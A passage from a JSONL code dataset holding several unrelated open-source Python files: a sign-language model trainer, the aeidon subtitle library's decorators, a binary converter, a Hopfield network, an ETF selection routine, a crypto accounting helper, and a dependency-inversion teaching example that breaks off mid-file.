print(f\"acc[{epoch}] = {acc_test.item()}\")\n loss_log.append(avg_loss / self.train_size)\n summary_writer.add_scalar(\"loss_train_text\", avg_loss, global_step=epoch)\n # summary_writer.add_scalar(\"accuracy_test\", acc_test.item(), global_step=epoch)\n # summary_writer.add_scalar(\"accuracy_train\",acc_train.item())\n # acc_log.append(acc_test)\n\n\nif __name__ == '__main__':\n use_gpu = True\n device = torch.device(\"cuda:0\" if use_gpu and torch.cuda.is_available() else \"cpu\")\n path_to_data = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\images\\\\coloredCaptureData\"\n _,imageDataSet = get_image_dataloader(path_to_data, batch_size=16)\n\n # path = \"C:\\\\HW\\\\singLang_DLProg\\\\text_data\\\\split\"\n path = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\text_data\\\\split\"\n\n train_iterator, test_iterator,vocab_letters,vocab_words,train_data,test_data = create_street_names_data_iterators(path)\n\n hybridDataSet = HybridDataSet(imageDataSet,test_data,vocab_words)\n dataloader = DataLoader(dataset=hybridDataSet, batch_size=2, shuffle=True)\n # someItem = hybridDataSet.__getitem__(2)\n # print(someItem[0].shape)\n # print(hybridDataSet.word_max_len)\n # def __init__(self, vocab_size,embedding_dim, lstm_size,hidden_dim, output_dim):\n\n text_model = HebLetterToSentence(len(vocab_letters), 128, 512, 128,len(vocab_words),use_self_emmbed=True)\n image_model = load_resnet_model('')\n\n\n model = HybridModel(image_model,text_model).to(device)\n optimizer = torch.optim.Adam(model.parameters(),lr=0.001)\n\n writer = SummaryWriter(comment=\"full_train\")\n # print(model)\n # x,y = next(iter(dataloader))\n # print(model(x))\n trainer = HybridTrainer(dataloader, test_iterator, model, optimizer, writer,save_checkpoint=5,device=device)\n\n trainer.train(\"full_run_test\",epochs=100, device=device)\n\n\n\n# import os\n# from random import uniform, random, choice, sample\n# import os\n# # from torchtext.data import Field, BucketIterator, TabularDataset\n# # from tensorflow.contrib.learn.python.learn.datasets.mnist import DataSet\n# import torch\n# from torch.utils.data import DataLoader,Dataset\n# from Code.data.dataloaders import get_image_dataloader\n# from Code.data.heb_data import create_street_names_data_iterators\n# from Code.models.resnet import SingLangResNet\n# import matplotlib.pyplot as plt\n#\n# class HybridDataSet(Dataset):\n#\n# def __init__(self,imageDataSet,textDataSet):\n# self.textDataSet = textDataSet\n# self.imageDataSet = imageDataSet\n# self.labelImageIndexDic = self.createletterToIndexDic()\n# self.word_max_len = self.get_max_len()\n# '''\n# create mapping between letter to the matching image index in the dataset\n# '''\n# def createletterToIndexDic(self):\n# dic ={}\n# max_size = -1\n# for i in range(len(self.imageDataSet)):\n# image,letter = self.imageDataSet[i]\n# if letter in dic.keys():\n# dic[self.imageDataSet.classes[letter]].append(i)\n# else:\n# dic[self.imageDataSet.classes[letter]] = [i]\n# return dic\n#\n# def __len__(self):\n# return len(self.textDataSet)\n#\n# def __getitem__(self, item):\n# textItem = self.textDataSet[item]\n# imagesIndexes = []\n# for hebLetter in textItem.chars:\n# engLetter = self.hebToEngConvertor(hebLetter)\n# imageIndexes = self.labelImageIndexDic[engLetter]\n# randomImage = choice(imageIndexes)\n#\n# imagesIndexes.append(randomImage)\n#\n# # add padding\n# for i in range(self.word_max_len - len(textItem.chars)):\n# engLetter = self.hebToEngConvertor('pad')\n# imageIndexes = self.labelImageIndexDic[engLetter]\n# randomImage = choice(imageIndexes)\n#\n# imagesIndexes.append(randomImage)\n# # image, letter = self.imageDataSet[randomImage]\n# # plt.imshow(image.squeeze(0).permute(1,2,0).numpy())\n# # print(hebLetter)\n# # plt.show()\n# # imagesFromDataSet = []\n# # for index in imagesIndexes:\n# # images, letters = self.imageDataSet[index]\n# # print(images.shape)\n# # break\n# # imagesFromDataSet.append(images)\n# imagesFromDataSet = torch.cat([self.imageDataSet[index][0].unsqueeze(0) for index in imagesIndexes],dim=0)\n# return imagesFromDataSet,textItem.names\n#\n# def hebToEngConvertor(self,x):\n# return {\n# 'א': 'A',\n# 'ב': 'B',\n# 'ג': 'C',\n# 'ד': 'D',\n# 'ה': 'E',\n# 'ו': 'F',\n# 'ז': 'G',\n# 'ח': 'H',\n# 'ט': 'I',\n# 'י': 'J',\n# 'כ': 'K',\n# 'ך': 'K',\n# 'ל': 'L',\n# 'מ': 'M',\n# 'נ': 'N',\n# 'ן': 'N',\n# 'ס': 'O',\n# 'ע': 'P',\n# 'פ': 'Q',\n# 'ף': 'Q',\n# 'צ': 'R',\n# 'ץ': 'R',\n# 'ק': 'S',\n# 'ר': 'T',\n# 'ש': 'U',\n# 'ת': 'V',\n# 'pad': 'W',\n# }[x]\n#\n# def get_max_len(self):\n# max_len = -1\n# for s in self.textDataSet:\n# if len(s.chars) > max_len:\n# max_len = len(s.chars)\n# return max_len\n#\n#\n#\n# if __name__ == '__main__':\n# # path_to_data = \"C:\\HW\\singLang_DLProg\\images\\coloredCaptureData_debug\"\n# path_to_data = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\images\\\\coloredCaptureData_debug\"\n# _,imageDataSet = get_image_dataloader(path_to_data, batch_size=16)\n#\n# # path = \"C:\\\\HW\\\\singLang_DLProg\\\\text_data\\\\split\"\n# path = \"D:\\\\Alon_temp\\\\singlang\\\\singLang_DLProg\\\\text_data\\\\split\"\n#\n# train_iterator, test_iterator,_,_,train_data,test_data = create_street_names_data_iterators(path)\n#\n# hybridDataSet = HybridDataSet(imageDataSet,test_data)\n# dataloader = DataLoader(dataset=hybridDataSet, batch_size=16, shuffle=True)\n# someItem = hybridDataSet.__getitem__(2)\n# print(someItem[0].shape)\n# print(hybridDataSet.word_max_len)\n","repo_name":"alonshoa/signLang_DLProg","sub_path":"Code/trianer/hybrid_train.py","file_name":"hybrid_train.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21999287466","text":"import aeidon\nimport collections\nimport copy\nimport functools\nimport pickle\nimport time\n\n# Python decorators normally do not preserve the signature of the original\n# function. We, however, absolutely need those function signatures kept to able\n# to autogenerate useful API documentation with sphinx. Let's use the\n# 'decorator' module [1] designed to solve this problem, but only if running\n# sphinx in order to avoid an unnecessary dependency and to avoid an additional\n# layer of code with its own runtime speed penalty and potential bugs.\n# Specifically, let's use the 'decorator_apply' function as instructed [2] to\n# avoid rewriting our standard-form decorators.\n#\n# [1] http://pypi.python.org/pypi/decorator/\n# [2] http://micheles.googlecode.com/hg/decorator/documentation.html\n\n\ndef _dump_subtitles(subtitles):\n \"\"\"Return a tuple of essential attributes of subtitles.\"\"\"\n return tuple((subtitle._start,\n subtitle._end,\n subtitle._main_text,\n subtitle._tran_text,\n subtitle._framerate) for subtitle in subtitles)\n\ndef _hasattr_def(obj, name):\n \"\"\"Return ``True`` if `obj` has attribute `name` defined.\"\"\"\n if hasattr(obj, \"__dict__\"):\n return name in obj.__dict__\n return hasattr(obj, name)\n\ndef _is_method(function, args):\n \"\"\"\n Return ``True`` if `function` to be decorated is a method.\n\n Decorator is required to have set an `original` attribute on the wrapped\n method pointing to the original unwrapped function.\n \"\"\"\n try:\n method = getattr(args[0], function.__name__)\n return (method.original is function)\n except (IndexError, AttributeError):\n return False\n\ndef benchmark(function):\n \"\"\"Decorator for benchmarking functions and methods.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n start = time.time()\n value = function(*args, **kwargs)\n duration = time.time() - start\n print(\"{:7.3f} {}\".format(duration, function.__name__))\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _benchmark = benchmark\n def benchmark(function):\n return decorator_apply(_benchmark, function)\n benchmark.__doc__ = _benchmark.__doc__\n\ndef contractual(function):\n \"\"\"\n Decorator for module level functions with pre- and/or postconditions.\n\n `function` call will be wrapped around ``FUNCTION_NAME_require`` and\n ``FUNCTION_NAME_ensure`` calls if such functions exist. The require\n function receives the same arguments as function, the ensure function will\n in addition receive function's return value as its first argument. This is\n a debug decorator that does nothing unless :data:`aeidon.DEBUG` is\n ``True``.\n \"\"\"\n if not aeidon.DEBUG:\n return function\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n name = \"{}_require\".format(function.__name__)\n if name in function.__globals__:\n function.__globals__[name](*args, **kwargs)\n value = function(*args, **kwargs)\n name = \"{}_ensure\".format(function.__name__)\n if name in function.__globals__:\n function.__globals__[name](value, *args, **kwargs)\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _contractual = contractual\n def contractual(function):\n return decorator_apply(_contractual, function)\n contractual.__doc__ = _contractual.__doc__\n\ndef decorator_apply(dec, fun):\n \"\"\"Rewrap `dec` to preserve function signature.\"\"\"\n import decorator\n return decorator.FunctionMaker.create(\n fun, 'return decorated(%(signature)s)',\n dict(decorated=dec(fun)), __wrapped__=fun)\n\ndef export(function):\n \"\"\"Decorator for delegate functions that are exported to master.\"\"\"\n function.export = True\n return function\n\nif aeidon.RUNNING_SPHINX:\n _export = export\n def export(function):\n return decorator_apply(_export, function)\n export.__doc__ = _export.__doc__\n\ndef memoize(limit=100):\n \"\"\"\n Decorator for functions that cache their return values.\n\n Use ``None`` for `limit` for a boundless cache.\n \"\"\"\n def outer_wrapper(function):\n cache = collections.OrderedDict()\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n params = (args, kwargs)\n if _is_method(function, args):\n params = (id(args[0]), args[1:], kwargs)\n key = pickle.dumps(params)\n try: return cache[key]\n except KeyError: pass\n cache[key] = function(*args, **kwargs)\n if limit is not None:\n while len(cache) > limit:\n cache.popitem(last=False)\n return cache[key]\n inner_wrapper.original = function\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n\ndef monkey_patch(obj, name):\n \"\"\"\n Decorator for functions that change `obj`'s `name` attribute.\n\n Any changes done will be reverted after the function is run, i.e. `name`\n attribute is either restored to its original value or deleted, if it didn't\n originally exist. The attribute in question must be able to correctly\n handle a :func:`copy.deepcopy` operation.\n\n Typical use would be unit testing code under legitimately unachievable\n conditions, e.g. pseudo-testing behaviour on Windows, while not actually\n using Windows::\n\n @aeidon.deco.monkey_patch(sys, \"platform\")\n def test_do_something():\n sys.platform = \"win32\"\n do_something()\n\n \"\"\"\n def outer_wrapper(function):\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n if _hasattr_def(obj, name):\n attr = getattr(obj, name)\n setattr(obj, name, copy.deepcopy(attr))\n try: return function(*args, **kwargs)\n finally:\n setattr(obj, name, attr)\n assert getattr(obj, name) == attr\n assert getattr(obj, name) is attr\n else: # Attribute not defined.\n try: return function(*args, **kwargs)\n finally:\n delattr(obj, name)\n assert not _hasattr_def(obj, name)\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n\ndef notify_frozen(function):\n \"\"\"Decorator for methods to be run in notify frozen state.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n frozen = args[0].freeze_notify()\n try: return function(*args, **kwargs)\n finally: args[0].thaw_notify(frozen)\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _notify_frozen = notify_frozen\n def notify_frozen(function):\n return decorator_apply(_notify_frozen, function)\n notify_frozen.__doc__ = _notify_frozen.__doc__\n\ndef once(function):\n \"\"\"Decorator for functions that cache their only return value.\"\"\"\n cache = []\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n try: return cache[0]\n except IndexError: pass\n cache.append(function(*args, **kwargs))\n return cache[0]\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _once = once\n def once(function):\n return decorator_apply(_once, function)\n once.__doc__ = _once.__doc__\n\ndef reversion_test(function):\n \"\"\"Decorator for unit testing reversions of one action.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n project = args[0].project\n original = _dump_subtitles(project.subtitles)\n value = function(*args, **kwargs)\n changed = _dump_subtitles(project.subtitles)\n assert changed != original\n for i in range(2):\n project.undo()\n current = _dump_subtitles(project.subtitles)\n assert current == original\n project.redo()\n current = _dump_subtitles(project.subtitles)\n assert current == changed\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _reversion_test = reversion_test\n def reversion_test(function):\n return decorator_apply(_reversion_test, function)\n reversion_test.__doc__ = _reversion_test.__doc__\n\ndef revertable(function):\n \"\"\"Decorator for revertable methods of :class:`aeidon.Project`.\"\"\"\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n project = args[0]\n main_changed = project.main_changed\n tran_changed = project.tran_changed\n kwargs.setdefault(\"register\", aeidon.registers.DO)\n register = kwargs[\"register\"]\n if register is None:\n # Execute plain function for special-case actions\n # that are not to be pushed to the undo stack.\n return function(*args, **kwargs)\n blocked = project.block(register.signal)\n if not blocked:\n # Execute plain function for nested function calls\n # that are part of another revertable action.\n return function(*args, **kwargs)\n try: value = function(*args, **kwargs)\n finally: project.unblock(register.signal)\n project.cut_reversion_stacks()\n if (project.main_changed != main_changed or\n project.tran_changed != tran_changed):\n project.emit_action_signal(register)\n return value\n return wrapper\n\nif aeidon.RUNNING_SPHINX:\n _revertable = revertable\n def revertable(function):\n return decorator_apply(_revertable, function)\n revertable.__doc__ = _revertable.__doc__\n\ndef silent(*exceptions):\n \"\"\"\n Decorator for ignoring `exceptions` raised by function.\n\n If no exceptions specified, ignore :exc:`Exception`.\n Return ``None`` if an exception encountered.\n \"\"\"\n if not exceptions:\n exceptions = (Exception,)\n def outer_wrapper(function):\n @functools.wraps(function)\n def inner_wrapper(*args, **kwargs):\n try: return function(*args, **kwargs)\n except exceptions: return None\n return inner_wrapper\n if aeidon.RUNNING_SPHINX:\n _outer_wrapper = outer_wrapper\n def outer_wrapper(function):\n return decorator_apply(_outer_wrapper, function)\n return outer_wrapper\n","repo_name":"unho/gaupol","sub_path":"aeidon/deco.py","file_name":"deco.py","file_ext":"py","file_size_in_byte":10549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"14455268717","text":"def konversi(x):\n if x == 1 or x == 0:\n return x\n\n panjang = len(str(x))\n AngkaPertama = x//pow(10, panjang-1)\n\n return (pow(2, panjang-1) * AngkaPertama) + konversi(x % pow(10, panjang-1))\n\nwhile True:\n Biner = int(input('Masukkan Biner : '))\n Desimal = konversi(Biner)\n\n print(\"Desimal dari\", Biner, 'adalah', Desimal)","repo_name":"melvin0507/Python-XI5-MelvinWaluyo","sub_path":"28 Januari 2021/Program 5.py","file_name":"Program 5.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19204175889","text":"import time\nimport os\nimport numpy as np\nimport torch\nimport torchvision\nfrom torch import Tensor, nn\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\n\nimport logging\n\nlogging.basicConfig()\nlogging.basicConfig(level=logging.NOTSET)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\ndataset = torchvision.datasets.MNIST(os.getcwd() + \"/files/MNIST/\", train=True, download=True)\n\n\nclass HopfieldNetwork:\n def __init__(self, n_neurons):\n self.sanity_check(n_neurons)\n self.n_neurons = n_neurons\n sqrt = int(np.sqrt(n_neurons))\n self.shape = (sqrt, sqrt)\n self.state = self.get_random_pattern()\n self.weights = np.zeros((self.n_neurons, self.n_neurons))\n self.patterns = None\n\n def get_activation(self, i):\n # get activation value of neuron at index i\n weights_to_neuron = self.weights[:, i]\n activation = sum(weights_to_neuron * self.state)\n return activation\n\n def update(self, i):\n # update neurons at index i\n if self.get_activation(i) >= 0:\n self.state[i] = 1\n else:\n self.state[i] = -1\n\n def run(self, steps):\n # without replacement\n start = time.time()\n if steps < self.n_neurons:\n indices = np.random.choice(range(self.n_neurons), steps, replace=False)\n else:\n indices = sorted(np.arange(steps), key=lambda k: np.random.random())\n for i in indices:\n while i >= self.n_neurons:\n i -= self.n_neurons\n self.update(i)\n logger.debug(f\"Made {steps} in {int(time.time() - start)} seconds.\")\n\n def solve(self):\n start = time.time()\n while not self.is_in_local_minima():\n self.run(self.n_neurons)\n logger.debug(f\"Solved in {int(time.time() - start)} seconds.\")\n\n def train(self):\n start = time.time()\n i, j = 0, 0\n stop = self.n_neurons - 1\n shown = {}\n\n while i != stop or j != stop:\n if j < stop:\n j += 1\n elif j == stop:\n j = 0\n i += 1\n if (i, j) in shown or i == j:\n continue\n else:\n shown[(j, i)] = None\n hebb_sum = np.mean(self.patterns[i, :] * self.patterns[j, :])\n self.weights[i, j] = hebb_sum\n self.weights[j, i] = hebb_sum\n logger.debug(f\"Trained Network in {int(time.time()-start)} seconds.\")\n\n def is_in_local_minima(self):\n for i in range(self.n_neurons):\n activation = self.get_activation(i)\n if activation >= 0:\n proper_state = 1\n else:\n proper_state = -1\n if self.state[i] != proper_state:\n return False\n return True\n\n def sanity_check(self, n_neurons):\n if n_neurons < 4:\n raise ValueError(f\"n_neurons provided is: {n_neurons} but must be at least 4\")\n sqrt = np.sqrt(n_neurons)\n if not sqrt.is_integer():\n raise ValueError(f\"n_neurons provided is: {n_neurons} but must be divisible by itself to an int\")\n if n_neurons < 100:\n logger.warning(\"We recommend to choose n_neurons to be >= 100 to ensure proper generation of characters.\")\n\n def is_saved(self, pattern):\n if self.patterns is None:\n return False\n for i in range(self.patterns.shape[1]):\n if (self.patterns[:, i] == pattern).all():\n return True\n return False\n\n def get_pattern_index(self, pattern):\n for i in range(self.patterns.shape[1]):\n if (self.patterns[:, i] == pattern).all():\n return i\n raise RuntimeError(\"Pattern is not saved.\")\n\n def save_pattern(self, pattern):\n if self.patterns is None:\n self.patterns = pattern.reshape(-1, 1)\n else:\n self.patterns = np.concatenate((self.patterns, pattern.reshape(-1, 1)), axis=1)\n\n def get_random_pattern(self):\n return np.random.choice((-1, 1), self.n_neurons)\n\n def get_number_pattern(self, number):\n while True:\n img, n = dataset[np.random.randint(len(dataset))]\n if n == number:\n break\n img = img.resize(self.shape)\n array = np.asarray(img)\n array = np.round(array / 255)\n array[array == 0] = -1\n return array.flatten()\n\n def visualize_array(self, array):\n fig = Figure(figsize=(3, 3), dpi=100)\n plot = fig.add_subplot(111)\n plot.imshow(array, cmap=\"Blues\", interpolation=\"nearest\")\n fig.axes[0].get_xaxis().set_visible(False)\n fig.axes[0].get_yaxis().set_visible(False)\n return fig\n\n def visualize_weight_matrix(self):\n fig = self.visualize_array(self.weights)\n dummy = plt.figure()\n new_manager = dummy.canvas.manager\n new_manager.canvas.figure = fig\n fig.set_canvas(new_manager.canvas)\n fig.show()\n\n def visualize(self, pattern=None):\n if pattern is None:\n pattern = self.state\n pattern = np.reshape(pattern, self.shape)\n return self.visualize_array(pattern)","repo_name":"kheuer/hopfield_network_portfolio","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38806399391","text":"from usefulTools import *\nimport FundApi\n\n# 每一期筛选2个ETF作为该行业的备选\ndef ETF_all_select(start_date, end_date, trading_fund=True, min_size = 0.5):\n ETF_name = FundApi.get_fund_name()\n test_start_date, test_end_date = get_pre_trade_date(start_date,240), end_date\n date_list = get_date_range(test_start_date, test_end_date)\n month_date_list = [get_pre_trade_date(x, offset=-1) if get_pre_trade_date(x, offset=-1) < end_date else end_date for x in\n get_date_range(start_date, end_date, period='M')]\n fund_tracking_index = FundApi.get_fund_1factor('fund_tracking_index', date_list=date_list) # 跟踪的指数\n if trading_fund == True:\n market_trade_fund = FundApi.get_fund_1factor('market_trade_fund', date_list=date_list).dropna(how='all', axis=1)\n fund_apply = FundApi.get_fund_1factor('fund_apply', date_list=date_list)[market_trade_fund.columns].dropna(how='all',axis=1)\n stock_fund = FundApi.get_fund_1factor('fund_type', date_list=date_list)[fund_apply.columns] == 1\n stock_fund = stock_fund.replace(False,np.nan).dropna(how='all',axis=1)\n\n fund_tracking_index = fund_tracking_index[stock_fund.columns][(market_trade_fund==True) & (fund_apply) & stock_fund]\n\n fund_NA = FundApi.get_fund_1factor('fund_NA', date_list=date_list).iloc[-1] / 1e8\n\n bench_close = get_daily_1factor('close',date_list=date_list,type='bench')['wind_A']\n bench_pct = bench_close.pct_change(1)\n fund_close = FundApi.get_fund_1factor('net_value_badj', date_list=date_list)\n fund_pct = fund_close.pct_change(1)\n fund_setup = (~fund_pct.isna()).cumsum() # 具备净值的时间\n ind = 'sw_all1'\n ind_name = get_ind_con(ind[:-1], int(ind[-1]))\n ind_name = pd.Series(ind_name)\n\n sw_close = get_daily_1factor('close',date_list=date_list, code_list=ind_name.index.to_list(), type='SW').dropna(how='all',axis=1)\n sw_pct = sw_close.pct_change(1)\n # 月度收益率\n ETF_pct20, SW_pct20 = fund_close.loc[month_date_list].pct_change(), sw_close.loc[month_date_list].pct_change()\n\n # ETF和申万行业的超额收益率\n ind_excess_pct = sw_pct.sub(bench_pct, axis=0).dropna()\n fund_excess_pct = fund_pct.sub(bench_pct, axis=0).loc[ind_excess_pct.index,fund_tracking_index.columns]\n\n # 获取行业对应的ETF,以及没有任何指数或行业对应的ETF\n ind_use_ETF = pd.DataFrame(index = sw_close.columns, columns =fund_tracking_index.columns)\n for industry in sw_pct.columns:\n ind_useful_ETF = fund_tracking_index[fund_tracking_index == industry].dropna(how='all',axis=1).columns.to_list()\n ind_use_ETF.loc[industry,ind_useful_ETF] = True\n # 再将一些对标指数的进行剔除\n no_ind_ETF = ind_use_ETF.isna().sum()[ind_use_ETF.isna().sum() == 32].index.to_list()\n no_ind_ETF = fund_tracking_index[no_ind_ETF].isna().sum() >= len(no_ind_ETF)\n\n\n all_ETF_ind = pd.DataFrame(index=date_list, columns=fund_pct.columns)\n select_ETF_ind = pd.DataFrame(index=date_list, columns=fund_pct.columns)\n for industry in tqdm(sw_pct.columns):\n # 第一步:先选取行业对应的ETF,和没有任何行业对应的ETF\n test_ETF = ind_use_ETF.loc[industry][ind_use_ETF.loc[industry]==True].index.to_list()\n test_ETF = set(test_ETF).union(no_ind_ETF[no_ind_ETF==True].index)\n\n # 开始滚动计算过去1年走势的而相关性\n _trans_IND = pd.concat([ind_excess_pct[[industry]] for x in test_ETF],axis=1)\n ETF_corr = rolling_corr(fund_excess_pct[test_ETF],_trans_IND,window=252)\n\n # 绝对值筛选:走势相关性必须再80%以上,上市时间必须在120日以上\n ETF_uesful = (ETF_corr > 0.8) & (fund_setup > 120) & (fund_NA > min_size)\n ETF_uesful = ETF_uesful[ETF_uesful==True].dropna(how='all',axis=1)\n\n ind_ETF = ETF_uesful.columns.to_list()\n\n if len(ind_ETF) > 0:\n # ------------- 开始对比和筛选 ----------------- #\n corr = ETF_corr[ind_ETF][ETF_uesful==True] # 走势相关性\n sharpe = fund_pct[ind_ETF].rolling(252,min_periods=120).mean() / fund_pct[ind_ETF].rolling(252,min_periods=120).std()\n excess_sharpe = (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252,min_periods=120).mean() / (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252,min_periods=120).std()\n # 跟踪误差\n trading_error = (fund_pct[ind_ETF].T - sw_pct[industry]).T.rolling(252, min_periods=120).std() * np.sqrt(252)\n trading_error20 = ETF_pct20[ind_ETF].sub(SW_pct20[industry],axis=0).rolling(int(240/12),min_periods=6).std() * np.sqrt(12)\n trading_error20 = trading_error20.reindex(date_list).ffill()\n # 实际跟踪收益率误差\n tracking_difference = abs(ETF_pct20[ind_ETF].T - SW_pct20[industry]).T.rolling(int(240/12),min_periods=6).mean()\n tracking_difference = tracking_difference.reindex(date_list).ffill()\n\n # ---------------- 开始进行对比 ----------------------- #\n abs_similar = (corr > 0.9) & (trading_error <= 0.05) & (trading_error20 <= 0.07)\n\n # ---------------- 相对需求 ---------------------------- #\n corr_rank = corr.rank(ascending=False,axis=1)\n sharpe_rank,excess_sharpe_rank = sharpe.rank(ascending=False,axis=1), excess_sharpe.rank(ascending=False,axis=1)\n trading_error_rank = trading_error.rank(ascending=True,axis=1)\n trading_error20_rank = trading_error20.rank(ascending=True,axis=1)\n tracking_difference_rank = tracking_difference.rank(ascending=True,axis=1)\n\n relative_similar = (corr_rank <= round(len(ind_ETF) / 2 + 0.01)) & (trading_error_rank <= round(len(ind_ETF) / 2 + 0.01)) & \\\n (trading_error20_rank <= round(len(ind_ETF) / 2 + 0.01))\n\n all_select = relative_similar | abs_similar\n all_ETF_ind[all_select==True] = industry\n # --- 剔除原有的结果 --- #\n del_ind = all_select.sum()[all_select.sum() >0].index.to_list()\n no_ind_ETF.loc[set(del_ind).intersection(no_ind_ETF.index)] = False\n # --------------------- 开始进行筛选 -----------------------#\n select_result = (corr_rank + sharpe_rank + excess_sharpe_rank + trading_error_rank + trading_error20_rank + tracking_difference_rank) / 6\n # 选择排名最高的前2个\n ETF = (select_result[all_select].rolling(20).mean().rank(ascending=False, method='min',axis=1) <= 2)\n\n select_ETF_ind[ETF == True] = industry\n\n all_ETF_ind = all_ETF_ind.dropna(how='all', axis=1)\n select_ETF_ind = select_ETF_ind.dropna(how='all', axis=1)\n\n return all_ETF_ind,select_ETF_ind\n\nstart_date, end_date = 20160101, 20230601\nall_ETF_ind,select_ETF_ind = ETF_all_select(start_date, end_date, trading_fund=True, min_size = 0.5)\nall_ETF_ind.to_pickle('C:/Users/86181/Desktop/量化策略体系/all_ETF_ind.pkl')\nselect_ETF_ind.to_pickle('C:/Users/86181/Desktop/量化策略体系/select_ETF_ind.pkl')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"gftaoxin/StrategyPythonCode","sub_path":"AIndustryRotation/Agarbage/ETF_test.py","file_name":"ETF_test.py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74530361224","text":"from typing import List\nfrom senkalib.senka_lib import SenkaLib\nfrom senkalib.senka_setting import SenkaSetting\nfrom senkalib.caaj_journal import CaajJournal\nfrom senka.plugin_manager import PluginManager\nimport pandas as pd\nimport os\n\nclass Senka:\n def __init__(self, setting_dict):\n self.setting = SenkaSetting(setting_dict)\n pass\n \n def get_caaj_csv(self, chain:str, address:str) -> str:\n caaj_list = self.get_caaj(chain, address)\n caaj_dict_list = map(lambda x: vars(x), caaj_list)\n df = pd.DataFrame(caaj_dict_list)\n df = df.sort_values('time')\n caaj_csv = df.to_csv(None, index=False)\n return caaj_csv\n\n def get_caaj(self, chain:str, address:str) -> List[CaajJournal]:\n available_chains = self.get_available_chains()\n if chain.lower() not in available_chains:\n raise ValueError('this chain is not supported.')\n\n caaj = []\n transaction_generator = list(filter(lambda x:x.chain.lower() == chain.lower(),SenkaLib.get_available_chain()))[0]\n transactions = transaction_generator.get_transactions(self.setting, address)\n plugins = PluginManager.get_plugins(chain, self.get_plugin_dir_path())\n\n for transaction in transactions:\n for plugin in plugins:\n if plugin.can_handle(transaction):\n caaj_peace = plugin.get_caajs(address, transaction)\n caaj.extend(caaj_peace)\n\n return caaj\n\n\n\n def get_available_chains(self) -> List[str]:\n chains = SenkaLib.get_available_chain()\n chains = list(map(lambda x:x.chain,chains))\n return chains\n\n def get_plugin_dir_path(self) -> str:\n return '%s/../plugin' % os.path.dirname(__file__)","repo_name":"yuma300/senka_ci_test","sub_path":"src/senka/senka.py","file_name":"senka.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30243561976","text":"# Dependency Inversion\n\n# When a class depends on abstraction \n# of other concrete subclasses\n\n# Analysis\n# Payments are depending of a specific authorizer\n\n# Solution\n# Create an abstract class for implements authorizers\n# Now we can add easily a new authorization method\n\n\n\nfrom abc import ABC, abstractmethod\n\n\nclass Order:\n items = []\n quantities = []\n prices = []\n status = \"open\"\n \n def add_item(self, name, quantity, price):\n self.items.append(name)\n self.quantities.append(quantity)\n self.prices.append(price)\n \n def total_price(self):\n total = 0\n for i in range(len(self.prices)):\n total += self.quantities[i] * self.prices[i]\n return total\n\n\nclass Authorizer(ABC):\n @abstractmethod\n def is_authorized(self) -> bool: ...\n \n \nclass SMSAuth(Authorizer):\n authorized = False\n \n def verify_code(self, code):\n print(f\"Verifying SMS code = {code}\")\n self.authorized = True\n \n def is_authorized(self):\n return self.authorized\n \n\nclass NotARobot(Authorizer):\n authorized = False\n \n def not_a_robot(self):\n print(\"Are you a robot? Naaa....\")\n self.authorized = True\n \n def is_authorized(self):\n return self.authorized \n\n\nclass PaymentProcessor(ABC):\n @abstractmethod\n def pay(self, order): ...\n \n \n\nclass DebitPaymentProcessor(PaymentProcessor):\n # passing a general authorizer\n def __init__(self, security_code, authorizer: Authorizer):\n self.security_code = security_code\n self.authorizer = authorizer\n \n \n def pay(self, order):\n if not self.authorizer.is_authorized():\n raise Exception(\"Not authorized!\")\n print(\"Processing debit payment type\")\n print(f\"Verifying security code: {self.security_code}\")\n order.status = \"paid\"\n\n\nclass CreditPaymentProcessor(PaymentProcessor):\n def __init__(self, security_code):\n self.security_code = security_code\n \n def pay(self, order):\n print(\"Processing debit payment type\")\n print(f\"Verifying security code: {self.security_code}\")\n order.status = \"paid\"\n\n \n \nclass PayPalPaymentProcessor(PaymentProcessor):\n def __init__(self, email, authorizer: Authorizer):\n self.authorizer = authorizer\n self.email = email\n \n def pay(self, order):\n if not self.authorizer.is_authorized():\n raise Exception(\"Not authorized!\")\n print(\"Processing PayPal payment type\")\n print(f\"Verifying email: {self.email}\")\n order.status = 